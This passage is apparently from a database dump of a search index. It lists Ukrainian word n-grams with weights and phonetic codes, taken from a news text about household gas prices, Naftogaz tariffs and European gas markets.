виправдовує',0,1,1.6333,'г000',1,'*'),(1647046,'газправда','газправда',0,0,0.6,'г000',2,'*'),(1647047,'газправда вже','газправда вже',0,1,1.4333,'г000',1,'*'),(1647048,'газправда вже чекає','газправда вже чекає',0,1,1.6333,'г000',1,'*'),(1647049,'газправди','газправди',0,0,0.6,'г000',2,'*'),(1647050,'газправди https','газправди https',0,1,1.5,'г312',1,'*'),(1647051,'газправди https gazpravda','газправди https gazpravda',0,1,1.8333,'г3121613',1,'*'),(1647052,'газпром','газпром',0,0,0.4667,'г000',1,'*'),(1647053,'газпром який','газпром який',0,1,1.4,'г000',1,'*'),(1647054,'газпром який штучно','газпром який штучно',0,1,1.6333,'г000',1,'*'),(1647055,'газу в червні','газу в червні',0,1,1.4333,'г000',1,'*'),(1647056,'газу на','газу на',0,1,1.2333,'г000',1,'*'),(1647057,'газу на європейському','газу на європейському',0,1,1.7,'г000',1,'*'),(1647058,'грн','грн',0,0,0.2,'г000',1,'*'),(1647059,'грн до','грн до',0,1,1.2,'г000',1,'*'),(1647060,'грн до 13,50','грн до 13,50',0,1,1.4,'г000',1,'*'),(1647061,'грн за','грн за',0,1,1.2,'г000',1,'*'),(1647062,'грн за кубометр','грн за кубометр',0,1,1.5,'г000',1,'*'),(1647063,'діє річна','діє річна',0,1,1.3,'д000',1,'*'),(1647064,'діє річна фіксована','діє річна фіксована',0,1,1.6333,'д000',1,'*'),(1647065,'даному','даному',0,0,0.4,'д000',1,'*'),(1647066,'даному випадку','даному випадку',0,1,1.4667,'д000',1,'*'),(1647067,'даному випадку споживачам','даному випадку споживачам',0,1,1.8333,'д000',1,'*'),(1647068,'дефіцит','дефіцит',0,0,0.4667,'д000',1,'*'),(1647069,'дефіцит газу','дефіцит газу',0,1,1.4,'д000',1,'*'),(1647070,'дефіцит газу на','дефіцит газу на',0,1,1.5,'д000',1,'*'),(1647071,'для літа','для літа',0,1,1.2667,'д000',1,'*'),(1647072,'для літа тенденцію','для літа тенденцію',0,1,1.6,'д000',1,'*'),(1647073,'для себе','для себе',0,1,1.2667,'д000',1,'*'),(1647074,'для себе найкращий','для себе найкращий',0,1,1.6,'д000',1,'*'),(1647075,'до 13,50','до 13,50',0,1,1.2667,'д000',1,'*'),(1647076,'до 13,50 грн','до 13,50 грн',0,1,1.4,'д000',1,'*'),(1647077,'до тарифного','до тарифного',0,1,1.4,'д000',1,'*'),(1647078,'до тарифного плану','до тарифного плану',0,1,1.6,'д000',1,'*'),(1647079,'дорожчає','дорожчає',0,0,0.5333,'д000',1,'*'),(1647080,'дорожчає на','дорожчає на',0,1,1.3667,'д000',1,'*'),(1647081,'дорожчає на таку','дорожчає на таку',0,1,1.5333,'д000',1,'*'),(1647082,'економіки','економіки',0,0,0.6,'е000',1,'*'),(1647083,'економіки низькі','економіки низькі',0,1,1.5333,'е000',1,'*'),(1647084,'економіки низькі запаси','економіки низькі запаси',0,1,1.7667,'е000',1,'*'),(1647085,'ж до','ж до',0,1,1.1333,'ж000',1,'*'),(1647086,'ж до тарифного','ж до тарифного',0,1,1.4667,'ж000',1,'*'),(1647087,'за 270','за 270',0,1,1.2,'з000',1,'*'),(1647088,'за 270 за','за 270 за',0,1,1.3,'з000',1,'*'),(1647089,'за бажанням','за бажанням',0,1,1.3667,'з000',1,'*'),(1647090,'за бажанням клієнта','за бажанням клієнта',0,1,1.6333,'з000',1,'*'),(1647091,'за кубометр','за кубометр',0,1,1.3667,'з000',1,'*'),(1647092,'за кубометр газу','за кубометр газу',0,1,1.5333,'з000',1,'*'),(1647093,'за кубометр перелік','за кубометр перелік',0,1,1.6333,'з000',1,'*'),(1647094,'за кубометр проте','за кубометр проте',0,1,1.5667,'з000',1,'*'),(1647095,'за кубометр річні','за кубометр річні',0,1,1.5667,'з000',1,'*'),(1647096,'за кубометр споживачі','за кубометр споживачі',0,1,1.7,'з000',1,'*'),(1647097,'за тисячу','за тисячу',0,1,1.3,'з000',1,'*'),(1647098,'за тисячу кубометрів','за тисячу кубометрів',0,1,1.6667,'з000',1,'*'),(1647099,'за умов','за умов',0,1,1.2333,'з000',1,'*'),(1647100,'за умов підвищення','за умов підвищення',0,1,1.6,'з000',1,'*'),(1647101,'завершення опалювального','завершення опалювального',0,1,1.8,'з000',1,'*'),(1647102,'завершення опалювального сезону','завершення опалювального сезону',0,1,2,'з000',1,'*'),(1647103,'залишатися','залишатися',0,0,0.6667,'з000',1,'*'),(1647104,'залишатися нарічних','залишатися нарічних',0,1,1.6333,'з000',1,'*'),(1647105,'залишатися нарічних базових','залишатися нарічних базових',0,1,1.9,'з000',1,'*'),(1647106,'запаси','запаси',0,0,0.4,'з000',1,'*'),(1647107,'запаси палива','запаси палива',0,1,1.4333,'з000',1,'*'),(1647108,'запаси палива в','запаси палива в',0,1,1.5,'з000',1,'*'),(1647109,'зафіксована','зафіксована',0,0,0.7333,'з000',1,'*'),(1647110,'зафіксована на','зафіксована на',0,1,1.4667,'з000',1,'*'),(1647111,'зафіксована на рік','зафіксована на рік',0,1,1.6,'з000',1,'*'),(1647112,'змінюється','змінюється',0,0,0.6667,'з000',1,'*'),(1647113,'змінюється навіть','змінюється навіть',0,1,1.5667,'з000',1,'*'),(1647114,'змінюється навіть за','змінюється навіть за',0,1,1.6667,'з000',1,'*'),(1647115,'клієнта','клієнта',0,0,0.4667,'к000',1,'*'),(1647116,'клієнта у','клієнта у',0,1,1.3,'к000',1,'*'),(1647117,'клієнта у даному','клієнта у даному',0,1,1.5333,'к000',1,'*'),(1647118,'коливань','коливань',0,0,0.5333,'к000',1,'*'),(1647119,'коливань підключення','коливань підключення',0,1,1.6667,'к000',1,'*'),(1647120,'коливань підключення ж','коливань підключення ж',0,1,1.7333,'к000',1,'*'),(1647121,'коливаються','коливаються',0,0,0.7333,'к000',1,'*'),(1647122,'коливаються від','коливаються від',0,1,1.5,'к000',1,'*'),(1647123,'коливаються від 7,80','коливаються від 7,80',0,1,1.6667,'к000',1,'*'),(1647124,'компаній','компаній',0,0,0.5333,'к000',1,'*'),(1647125,'компаній коливаються','компаній коливаються',0,1,1.6667,'к000',1,'*'),(1647126,'компаній коливаються від','компаній коливаються від',0,1,1.8,'к000',1,'*'),(1647127,'компаній обіцяють','компаній обіцяють',0,1,1.5667,'к000',1,'*'),(1647128,'компаній обіцяють презентувати','компаній обіцяють презентувати',0,1,2,'к000',1,'*'),(1647129,'конкурентні','конкурентні',0,0,0.7333,'к000',1,'*'),(1647130,'конкурентні пропозиції','конкурентні пропозиції',0,1,1.7333,'к000',1,'*'),(1647131,'конкурентні пропозиції та','конкурентні пропозиції та',0,1,1.8333,'к000',1,'*'),(1647132,'кубометр','кубометр',0,0,0.5333,'к000',1,'*'),(1647133,'кубометр газу','кубометр газу',0,1,1.4333,'к000',1,'*'),(1647134,'кубометр газу в','кубометр газу в',0,1,1.5,'к000',1,'*'),(1647135,'кубометр перелік','кубометр перелік',0,1,1.5333,'к000',1,'*'),(1647136,'кубометр перелік усіх','кубометр перелік усіх',0,1,1.7,'к000',1,'*'),(1647137,'кубометр проте','кубометр проте',0,1,1.4667,'к000',1,'*'),(1647138,'кубометр проте ціну','кубометр проте ціну',0,1,1.6333,'к000',1,'*'),(1647139,'кубометр річні','кубометр річні',0,1,1.4667,'к000',1,'*'),(1647140,'кубометр річні ціни','кубометр річні ціни',0,1,1.6333,'к000',1,'*'),(1647141,'кубометр споживачі','кубометр споживачі',0,1,1.6,'к000',1,'*'),(1647142,'кубометр споживачі не','кубометр споживачі не',0,1,1.7,'к000',1,'*'),(1647143,'кубометрів','кубометрів',0,0,0.6667,'к000',1,'*'),(1647144,'кубометрів таким','кубометрів таким',0,1,1.5333,'к000',1,'*'),(1647145,'кубометрів таким чином','кубометрів таким чином',0,1,1.7333,'к000',1,'*'),(1647146,'літа','літа',0,0,0.2667,'л000',1,'*'),(1647147,'літа тенденцію','літа тенденцію',0,1,1.4667,'л000',1,'*'),(1647148,'літа тенденцію впливають','літа тенденцію впливають',0,1,1.8,'л000',1,'*'),(1647149,'липні','липні',0,0,0.3333,'л000',1,'*'),(1647150,'липні більшість','липні більшість',0,1,1.5,'л000',1,'*'),(1647151,'липні більшість компаній','липні більшість компаній',0,1,1.8,'л000',1,'*'),(1647152,'лише дорожчає','лише дорожчає',0,1,1.4333,'л000',1,'*'),(1647153,'лише дорожчає на','лише дорожчає на',0,1,1.5333,'л000',1,'*'),(1647154,'лише за','лише за',0,1,1.2333,'л000',1,'*'),(1647155,'лише за бажанням','лише за бажанням',0,1,1.5333,'л000',1,'*'),(1647156,'майже','майже',0,0,0.3333,'м000',1,'*'),(1647157,'майже 12','майже 12',0,1,1.2667,'м000',1,'*'),(1647158,'майже 12 грн','майже 12 грн',0,1,1.4,'м000',1,'*'),(1647159,'мвт-год','мвт-год',0,0,0.4667,'м000',1,'*'),(1647160,'мвт-год що','мвт-год що',0,1,1.3333,'м000',1,'*'),(1647161,'мвт-год що трохи','мвт-год що трохи',0,1,1.5333,'м000',1,'*'),(1647162,'могли','могли',0,0,0.3333,'м000',1,'*'),(1647163,'могли обрати','могли обрати',0,1,1.4,'м000',1,'*'),(1647164,'могли обрати для','могли обрати для',0,1,1.5333,'м000',1,'*'),(1647165,'можна переглянути в','можна переглянути в',0,1,1.6333,'м000',2,'*'),(1647166,'на європейських','на європейських',0,1,1.5,'н000',1,'*'),(1647167,'на європейських хабах','на європейських хабах',0,1,1.7,'н000',1,'*'),(1647168,'на європейському','на європейському',0,1,1.5333,'н000',1,'*'),(1647169,'на європейському ринку','на європейському ринку',0,1,1.7333,'н000',1,'*'),(1647170,'на газ','на газ',0,1,1.2,'н000',1,'*'),(1647171,'на газ у','на газ у',0,1,1.2667,'н000',1,'*'),(1647172,'на газ уже','на газ уже',0,1,1.3333,'н000',1,'*'),(1647173,'на початок','на початок',0,1,1.3333,'н000',1,'*'),(1647174,'на початок червня','на початок червня',0,1,1.5667,'н000',1,'*'),(1647175,'на різні','на різні',0,1,1.2667,'н000',1,'*'),(1647176,'на різні конкурентні','на різні конкурентні',0,1,1.6667,'н000',1,'*'),(1647177,'на рік','на рік',0,1,1.2,'н000',1,'*'),(1647178,'на рік і','на рік і',0,1,1.2667,'н000',1,'*'),(1647179,'на таку','на таку',0,1,1.2333,'н000',1,'*'),(1647180,'на таку незвичну','на таку незвичну',0,1,1.5333,'н000',1,'*'),(1647181,'навіть за','навіть за',0,1,1.3,'н000',1,'*'),(1647182,'навіть за умов','навіть за умов',0,1,1.4667,'н000',1,'*'),(1647183,'найкращий','найкращий',0,0,0.6,'н000',1,'*'),(1647184,'найкращий варіант','найкращий варіант',0,1,1.5667,'н000',1,'*'),(1647185,'найкращий варіант https','найкращий варіант https',0,1,1.7667,'н312',1,'*'),(1647186,'наприклад із','наприклад із',0,1,1.4,'н000',1,'*'),(1647187,'наприклад із рівними','наприклад із рівними',0,1,1.6667,'н000',1,'*'),(1647188,'нарічних','нарічних',0,0,0.5333,'н000',1,'*'),(1647189,'нарічних базових','нарічних базових',0,1,1.5333,'н000',1,'*'),(1647190,'нарічних базових пропозиціях','нарічних базових пропозиціях',0,1,1.9333,'н000',1,'*'),(1647191,'нафтогазу','нафтогазу',0,0,0.6,'н000',1,'*'),(1647192,'нафтогазу вона','нафтогазу вона',0,1,1.4667,'н000',1,'*'),(1647193,'нафтогазу вона складає','нафтогазу вона складає',0,1,1.7333,'н000',1,'*'),(1647194,'не змінюється','не змінюється',0,1,1.4333,'н000',1,'*'),(1647195,'не змінюється навіть','не змінюється навіть',0,1,1.6667,'н000',1,'*'),(1647196,'не платитимуть','не платитимуть',0,1,1.4667,'н000',1,'*'),(1647197,'не платитимуть адже','не платитимуть адже',0,1,1.6333,'н000',1,'*'),(1647198,'незвичну','незвичну',0,0,0.5333,'н000',1,'*'),(1647199,'незвичну для','незвичну для',0,1,1.4,'н000',1,'*'),(1647200,'незвичну для літа','незвичну для літа',0,1,1.5667,'н000',1,'*'),(1647201,'низькі','низькі',0,0,0.4,'н000',1,'*'),(1647202,'низькі запаси','низькі запаси',0,1,1.4333,'н000',1,'*'),(1647203,'низькі запаси палива','низькі запаси палива',0,1,1.6667,'н000',1,'*'),(1647204,'обіцяють','обіцяють',0,0,0.5333,'о000',1,'*'),(1647205,'обіцяють презентувати','обіцяють презентувати',0,1,1.7,'о000',1,'*'),(1647206,'обіцяють презентувати свої','обіцяють презентувати свої',0,1,1.8667,'о000',1,'*'),(1647207,'обмежуючи','обмежуючи',0,0,0.6,'о000',1,'*'),(1647208,'обмежуючи обсяги','обмежуючи обсяги',0,1,1.5333,'о000',1,'*'),(1647209,'обмежуючи обсяги постачання','обмежуючи обсяги постачання',0,1,1.9,'о000',1,'*'),(1647210,'обрати для','обрати для',0,1,1.3333,'о000',1,'*'),(1647211,'обрати для себе','обрати для себе',0,1,1.5,'о000',1,'*'),(1647212,'обсяги','обсяги',0,0,0.4,'о000',1,'*'),(1647213,'обсяги постачання','обсяги постачання',0,1,1.5667,'о000',1,'*'),(1647214,'обсяги постачання у','обсяги постачання у',0,1,1.6333,'о000',1,'*'),(1647215,'огляд','огляд',0,0,0.3333,'о000',1,'*'),(1647216,'огляд сезонних','огляд сезонних',0,1,1.4667,'о000',1,'*'),(1647217,'огляд сезонних цін','огляд сезонних цін',0,1,1.6,'о000',1,'*'),(1647218,'огляді','огляді',0,0,0.4,'о000',1,'*'),(1647219,'огляді газправди','огляді газправди',0,1,1.5333,'о000',1,'*'),(1647220,'огляді газправди https','огляді газправди https',0,1,1.7333,'о312',1,'*'),(1647221,'опалювального','опалювального',0,0,0.8667,'о000',1,'*'),(1647222,'опалювального сезону','опалювального сезону',0,1,1.6667,'о000',1,'*'),(1647223,'опалювального сезону газ','опалювального сезону газ',0,1,1.8,'о000',1,'*'),(1647224,'підвищення цін','підвищення цін',0,1,1.4667,'п000',1,'*'),(1647225,'підвищення цін на','підвищення цін на',0,1,1.5667,'п000',1,'*'),(1647226,'підготує','підготує',0,0,0.5333,'п000',1,'*'),(1647227,'підготує спеціальний','підготує спеціальний',0,1,1.6667,'п000',1,'*'),(1647228,'підготує спеціальний огляд','підготує спеціальний огляд',0,1,1.8667,'п000',1,'*'),(1647229,'підключення','підключення',0,0,0.7333,'п000',1,'*'),(1647230,'підключення ж','підключення ж',0,1,1.4333,'п000',1,'*'),(1647231,'підключення ж до','підключення ж до',0,1,1.5333,'п000',1,'*'),(1647232,'палива','палива',0,0,0.4,'п000',2,'*'),(1647233,'палива в','палива в',0,1,1.2667,'п000',1,'*'),(1647234,'палива в сховищах','палива в сховищах',0,1,1.5667,'п000',1,'*'),(1647235,'переглянути в','переглянути в',0,1,1.4333,'п000',2,'*'),(1647236,'переглянути в огляді','переглянути в огляді',0,1,1.6667,'п000',1,'*'),(1647237,'перелік','перелік',0,0,0.4667,'п000',1,'*'),(1647238,'перелік усіх','перелік усіх',0,1,1.4,'п000',1,'*'),(1647239,'перелік усіх пропозицій','перелік усіх пропозицій',0,1,1.7667,'п000',1,'*'),(1647240,'плану «місячний»','плану «місячний»',0,1,1.5333,'п000',1,'*'),(1647241,'плану «місячний» відбувається','плану «місячний» відбувається',0,1,1.9667,'п000',1,'*'),(1647242,'платитимуть','платитимуть',0,0,0.7333,'п000',1,'*'),(1647243,'платитимуть адже','платитимуть адже',0,1,1.5333,'п000',1,'*'),(1647244,'платитимуть адже як','платитимуть адже як',0,1,1.6333,'п000',1,'*'),(1647245,'пожвавлення','пожвавлення',0,0,0.7333,'п000',1,'*'),(1647246,'пожвавлення економіки','пожвавлення економіки',0,1,1.7,'п000',1,'*'),(1647247,'пожвавлення економіки низькі','пожвавлення економіки низькі',0,1,1.9333,'п000',1,'*'),(1647248,'помісячними','помісячними',0,0,0.7333,'п000',1,'*'),(1647249,'помісячними проплатами','помісячними проплатами',0,1,1.7333,'п000',1,'*'),(1647250,'помісячними проплатами газправда','помісячними проплатами газправда',0,1,2,'п000',1,'*'),(1647251,'попри','попри',0,0,0.3333,'п000',1,'*'),(1647252,'попри завершення','попри завершення',0,1,1.5333,'п000',1,'*'),(1647253,'попри завершення опалювального','попри завершення опалювального',0,1,2,'п000',1,'*'),(1647254,'постачання','постачання',0,0,0.6667,'п000',1,'*'),(1647255,'постачання у','постачання у',0,1,1.4,'п000',1,'*'),(1647256,'постачання у середньому','постачання у середньому',0,1,1.7667,'п000',1,'*'),(1647257,'початок','початок',0,0,0.4667,'п000',2,'*'),(1647258,'початок червня','початок червня',0,1,1.4667,'п000',1,'*'),(1647259,'початок червня сягали','початок червня сягали',0,1,1.7,'п000',1,'*'),(1647260,'презентувати','презентувати',0,0,0.8,'п000',1,'*'),(1647261,'презентувати свої','презентувати свої',0,1,1.5667,'п000',1,'*'),(1647262,'презентувати свої сезонні','презентувати свої сезонні',0,1,1.8333,'п000',1,'*'),(1647263,'продукти наприклад','продукти наприклад',0,1,1.6,'п000',1,'*'),(1647264,'продукти наприклад із','продукти наприклад із',0,1,1.7,'п000',1,'*'),(1647265,'проплатами','проплатами',0,0,0.6667,'п000',1,'*'),(1647266,'проплатами газправда','проплатами газправда',0,1,1.6667,'п000',1,'*'),(1647267,'проплатами газправда вже','проплатами газправда вже',0,1,1.8,'п000',1,'*'),(1647268,'пропозиції та','пропозиції та',0,1,1.4333,'п000',1,'*'),(1647269,'пропозиції та підготує','пропозиції та підготує',0,1,1.7333,'п000',1,'*'),(1647270,'пропозицій','пропозицій',0,0,0.6667,'п000',1,'*'),(1647271,'пропозицій можна','пропозицій можна',0,1,1.5333,'п000',1,'*'),(1647272,'пропозицій можна переглянути','пропозицій можна переглянути',0,1,1.9333,'п000',1,'*'),(1647273,'пропозиціях','пропозиціях',0,0,0.7333,'п000',1,'*'),(1647274,'пропозиціях але','пропозиціях але',0,1,1.5,'п000',1,'*'),(1647275,'пропозиціях але вже','пропозиціях але вже',0,1,1.6333,'п000',1,'*'),(1647276,'проте','проте',0,0,0.3333,'п000',1,'*'),(1647277,'проте ціну','проте ціну',0,1,1.3333,'п000',1,'*'),(1647278,'проте ціну в','проте ціну в',0,1,1.4,'п000',1,'*'),(1647279,'рівними','рівними',0,0,0.4667,'р000',1,'*'),(1647280,'рівними помісячними','рівними помісячними',0,1,1.6333,'р000',1,'*'),(1647281,'рівними помісячними проплатами','рівними помісячними проплатами',0,1,2,'р000',1,'*'),(1647282,'різні конкурентні','різні конкурентні',0,1,1.5667,'р000',1,'*'),(1647283,'різні конкурентні пропозиції','різні конкурентні пропозиції',0,1,1.9333,'р000',1,'*'),(1647284,'рік','рік',0,0,0.2,'р000',3,'*'),(1647285,'рік і','рік і',0,1,1.1667,'р000',1,'*'),(1647286,'рік і не','рік і не',0,1,1.2667,'р000',1,'*'),(1647287,'річні','річні',0,0,0.3333,'р000',1,'*'),(1647288,'річні продукти','річні продукти',0,1,1.4667,'р000',1,'*'),(1647289,'річні продукти наприклад','річні продукти наприклад',0,1,1.8,'р000',1,'*'),(1647290,'річні ціни','річні ціни',0,1,1.3333,'р000',1,'*'),(1647291,'річні ціни решти','річні ціни решти',0,1,1.5333,'р000',1,'*'),(1647292,'річна','річна',0,0,0.3333,'р000',2,'*'),(1647293,'річна фіксована','річна фіксована',0,1,1.5,'р000',1,'*'),(1647294,'річна фіксована ціна','річна фіксована ціна',0,1,1.6667,'р000',1,'*'),(1647295,'річна ціна','річна ціна',0,1,1.3333,'р000',1,'*'),(1647296,'річна ціна зафіксована','річна ціна зафіксована',0,1,1.7333,'р000',1,'*'),(1647297,'решти','решти',0,0,0.3333,'р000',1,'*'),(1647298,'решти компаній','решти компаній',0,1,1.4667,'р000',1,'*'),(1647299,'решти компаній коливаються','решти компаній коливаються',0,1,1.8667,'р000',1,'*'),(1647300,'ринкова','ринкова',0,0,0.4667,'р000',1,'*'),(1647301,'ринкова ціна','ринкова ціна',0,1,1.4,'р000',1,'*'),(1647302,'ринкова ціна за','ринкова ціна за',0,1,1.5,'р000',1,'*'),(1647303,'ринку обмежуючи','ринку обмежуючи',0,1,1.5,'р000',1,'*'),(1647304,'ринку обмежуючи обсяги','ринку обмежуючи обсяги',0,1,1.7333,'р000',1,'*'),(1647305,'російський','російський',0,0,0.6667,'р000',1,'*'),(1647306,'російський газпром','російський газпром',0,1,1.6,'р000',1,'*'),(1647307,'російський газпром який','російський газпром який',0,1,1.7667,'р000',1,'*'),(1647308,'свої сезонні','свої сезонні',0,1,1.4,'с000',1,'*'),(1647309,'свої сезонні та','свої сезонні та',0,1,1.5,'с000',1,'*'),(1647310,'себе найкращий','себе найкращий',0,1,1.4667,'с000',1,'*'),(1647311,'себе найкращий варіант','себе найкращий варіант',0,1,1.7333,'с000',1,'*'),(1647312,'сезонні','сезонні',0,0,0.4667,'с000',1,'*'),(1647313,'сезонні та','сезонні та',0,1,1.3333,'с000',1,'*'),(1647314,'сезонні та альтернативні','сезонні та альтернативні',0,1,1.8,'с000',1,'*'),(1647315,'сезонних','сезонних',0,0,0.5333,'с000',1,'*'),(1647316,'сезонних коливань','сезонних коливань',0,1,1.5667,'с000',1,'*'),(1647317,'сезонних коливань підключення','сезонних коливань підключення',0,1,1.9667,'с000',1,'*'),(1647318,'сезонних цін','сезонних цін',0,1,1.4,'с000',1,'*'),(1647319,'сезонних цін аби','сезонних цін аби',0,1,1.5333,'с000',1,'*'),(1647320,'сезону газ','сезону газ',0,1,1.3333,'с000',1,'*'),(1647321,'сезону газ у','сезону газ у',0,1,1.4,'с000',1,'*'),(1647322,'середньому','середньому',0,0,0.6667,'с000',2,'*'),(1647323,'середньому ціни','середньому ціни',0,1,1.5,'с000',1,'*'),(1647324,'середньому ціни на','середньому ціни на',0,1,1.6,'с000',1,'*'),(1647325,'складає','складає',0,0,0.4667,'с000',1,'*'),(1647326,'складає 7,96','складає 7,96',0,1,1.4,'с000',1,'*'),(1647327,'складає 7,96 грн','складає 7,96 грн',0,1,1.5333,'с000',1,'*'),(1647328,'спеціальний','спеціальний',0,0,0.7333,'с000',1,'*'),(1647329,'спеціальний огляд','спеціальний огляд',0,1,1.5667,'с000',1,'*'),(1647330,'спеціальний огляд сезонних','спеціальний огляд сезонних',0,1,1.8667,'с000',1,'*'),(1647331,'споживачі','споживачі',0,0,0.6,'с000',2,'*'),(1647332,'споживачі могли','споживачі могли',0,1,1.5,'с000',1,'*'),(1647333,'споживачі могли обрати','споживачі могли обрати',0,1,1.7333,'с000',1,'*'),(1647334,'споживачі не','споживачі не',0,1,1.4,'с000',1,'*'),(1647335,'споживачі не платитимуть','споживачі не платитимуть',0,1,1.8,'с000',1,'*'),(1647336,'споживачам','споживачам',0,0,0.6667,'с000',3,'*'),(1647337,'споживачам справді','споживачам справді',0,1,1.6,'с000',1,'*'),(1647338,'споживачам справді вигідно','споживачам справді вигідно',0,1,1.8667,'с000',1,'*'),(1647339,'справді','справді',0,0,0.4667,'с000',1,'*'),(1647340,'справді вигідно','справді вигідно',0,1,1.5,'с000',1,'*'),(1647341,'справді вигідно залишатися','справді вигідно залишатися',0,1,1.8667,'с000',1,'*'),(1647342,'створює','створює',0,0,0.4667,'с000',1,'*'),(1647343,'створює дефіцит','створює дефіцит',0,1,1.5,'с000',1,'*'),(1647344,'створює дефіцит газу','створює дефіцит газу',0,1,1.6667,'с000',1,'*'),(1647345,'сховищах','сховищах',0,0,0.5333,'с000',1,'*'),(1647346,'сховищах а','сховищах а',0,1,1.3333,'с000',1,'*'),(1647347,'сховищах а також','сховищах а також',0,1,1.5333,'с000',1,'*'),(1647348,'сягає','сягає',0,0,0.3333,'с000',1,'*'),(1647349,'сягає майже','сягає майже',0,1,1.3667,'с000',1,'*'),(1647350,'сягає майже 12','сягає майже 12',0,1,1.4667,'с000',1,'*'),(1647351,'сягали','сягали',0,0,0.4,'с000',1,'*'),(1647352,'сягали 25,9','сягали 25,9',0,1,1.3667,'с000',1,'*'),(1647353,'сягали 25,9 євро','сягали 25,9 євро',0,1,1.5333,'с000',1,'*'),(1647354,'та альтернативні','та альтернативні',0,1,1.5333,'т000',1,'*'),(1647355,'та альтернативні річні','та альтернативні річні',0,1,1.7333,'т000',1,'*'),(1647356,'та підготує','та підготує',0,1,1.3667,'т000',1,'*'),(1647357,'та підготує спеціальний','та підготує спеціальний',0,1,1.7667,'т000',1,'*'),(1647358,'таким','таким',0,0,0.3333,'т000',2,'*'),(1647359,'таким чином','таким чином',0,1,1.3667,'т000',2,'*'),(1647360,'таким чином ринкова','таким чином ринкова',0,1,1.6333,'т000',1,'*'),(1647361,'також російський','також російський',0,1,1.5333,'т000',1,'*'),(1647362,'також російський газпром','також російський газпром',0,1,1.8,'т000',1,'*'),(1647363,'таку','таку',0,0,0.2667,'т000',1,'*'),(1647364,'таку незвичну','таку незвичну',0,1,1.4333,'т000',1,'*'),(1647365,'таку незвичну для','таку незвичну для',0,1,1.5667,'т000',1,'*'),(1647366,'тарифного','тарифного',0,0,0.6,'т000',2,'*'),(1647367,'тарифного плану','тарифного плану',0,1,1.5,'т000',1,'*'),(1647368,'тарифного плану «місячний»','тарифного плану «місячний»',0,1,1.8667,'т000',1,'*'),(1647369,'тенденцію','тенденцію',0,0,0.6,'т000',1,'*'),(1647370,'тенденцію впливають','тенденцію впливають',0,1,1.6333,'т000',1,'*'),(1647371,'тенденцію впливають пожвавлення','тенденцію впливають пожвавлення',0,1,2,'т000',1,'*'),(1647372,'тисячу кубометрів','тисячу кубометрів',0,1,1.5667,'т000',1,'*'),(1647373,'тисячу кубометрів таким','тисячу кубометрів таким',0,1,1.7667,'т000',1,'*'),(1647374,'трохи','трохи',0,0,0.3333,'т000',1,'*'),(1647375,'трохи більше','трохи більше',0,1,1.4,'т000',1,'*'),(1647376,'трохи більше за','трохи більше за',0,1,1.5,'т000',1,'*'),(1647377,'у європі','у європі',0,1,1.2667,'у000',1,'*'),(1647378,'у європі лише','у європі лише',0,1,1.4333,'у000',1,'*'),(1647379,'у європі на','у європі на',0,1,1.3667,'у000',1,'*'),(1647380,'у даному','у даному',0,1,1.2667,'у000',1,'*'),(1647381,'у даному випадку','у даному випадку',0,1,1.5333,'у000',1,'*'),(1647382,'у нафтогазу','у нафтогазу',0,1,1.3667,'у000',1,'*'),(1647383,'у нафтогазу вона','у нафтогазу вона',0,1,1.5333,'у000',1,'*'),(1647384,'у середньому','у середньому',0,1,1.4,'у000',1,'*'),(1647385,'у середньому ціни','у середньому ціни',0,1,1.5667,'у000',1,'*'),(1647386,'уже','уже',0,0,0.2,'у000',1,'*'),(1647387,'уже виправдовує','уже виправдовує',0,1,1.5,'у000',1,'*'),(1647388,'уже виправдовує себе','уже виправдовує себе',0,1,1.6667,'у000',1,'*'),(1647389,'умов','умов',0,0,0.2667,'у000',1,'*'),(1647390,'умов підвищення','умов підвищення',0,1,1.5,'у000',1,'*'),(1647391,'умов підвищення цін','умов підвищення цін',0,1,1.6333,'у000',1,'*'),(1647392,'усіх пропозицій','усіх пропозицій',0,1,1.5,'у000',1,'*'),(1647393,'усіх пропозицій можна','усіх пропозицій можна',0,1,1.7,'у000',1,'*'),(1647394,'фіксована','фіксована',0,0,0.6,'ф000',1,'*'),(1647395,'фіксована ціна','фіксована ціна',0,1,1.4667,'ф000',1,'*'),(1647396,'фіксована ціна на','фіксована ціна на',0,1,1.5667,'ф000',1,'*'),(1647397,'фіксована ціна у','фіксована ціна у',0,1,1.5333,'ф000',1,'*'),(1647398,'хабах','хабах',0,0,0.3333,'х000',1,'*'),(1647399,'хабах і','хабах і',0,1,1.2333,'х000',1,'*'),(1647400,'хабах і сезонних','хабах і сезонних',0,1,1.5333,'х000',1,'*'),(1647401,'цін','цін',0,0,0.2,'ц000',1,'*'),(1647402,'цін аби','цін аби',0,1,1.2333,'ц000',1,'*'),(1647403,'цін аби споживачі','цін аби споживачі',0,1,1.5667,'ц000',1,'*'),(1647404,'цін на','цін на',0,1,1.2,'ц000',1,'*'),(1647405,'цін на європейських','цін на європейських',0,1,1.6333,'ц000',1,'*'),(1647406,'ціна за','ціна за',0,1,1.2333,'ц000',1,'*'),(1647407,'ціна за кубометр','ціна за кубометр',0,1,1.5333,'ц000',1,'*'),(1647408,'ціна зафіксована','ціна зафіксована',0,1,1.5333,'ц000',1,'*'),(1647409,'ціна зафіксована на','ціна зафіксована на',0,1,1.6333,'ц000',1,'*'),(1647410,'ціна на','ціна на',0,1,1.2333,'ц000',1,'*'),(1647411,'ціна на газ','ціна на газ',0,1,1.3667,'ц000',1,'*'),(1647412,'ціна у','ціна у',0,1,1.2,'ц000',1,'*'),(1647413,'ціна у нафтогазу','ціна у нафтогазу',0,1,1.5333,'ц000',1,'*'),(1647414,'ціни на газ','ціни на газ',0,1,1.3667,'ц000',1,'*'),(1647415,'ціни решти','ціни решти',0,1,1.3333,'ц000',1,'*'),(1647416,'ціни решти компаній','ціни решти компаній',0,1,1.6333,'ц000',1,'*'),(1647417,'ціну','ціну',0,0,0.2667,'ц000',1,'*'),(1647418,'ціну в','ціну в',0,1,1.2,'ц000',1,'*'),(1647419,'ціну в майже','ціну в майже',0,1,1.4,'ц000',1,'*'),(1647420,'чекає','чекає',0,0,0.3333,'ч000',1,'*'),(1647421,'чекає на','чекає на',0,1,1.2667,'ч000',1,'*'),(1647422,'чекає на різні','чекає на різні',0,1,1.4667,'ч000',1,'*'),(1647423,'червні','червні',0,0,0.4,'ч000',1,'*'),(1647424,'червні сягає','червні сягає',0,1,1.4,'ч000',1,'*'),(1647425,'червні сягає майже','червні сягає майже',0,1,1.6,'ч000',1,'*'),(1647426,'червня','червня',0,0,0.4,'ч000',1,'*'),(1647427,'червня сягали','червня сягали',0,1,1.4333,'ч000',1,'*'),(1647428,'червня сягали 25,9','червня сягали 25,9',0,1,1.6,'ч000',1,'*'),(1647429,'чином ринкова','чином 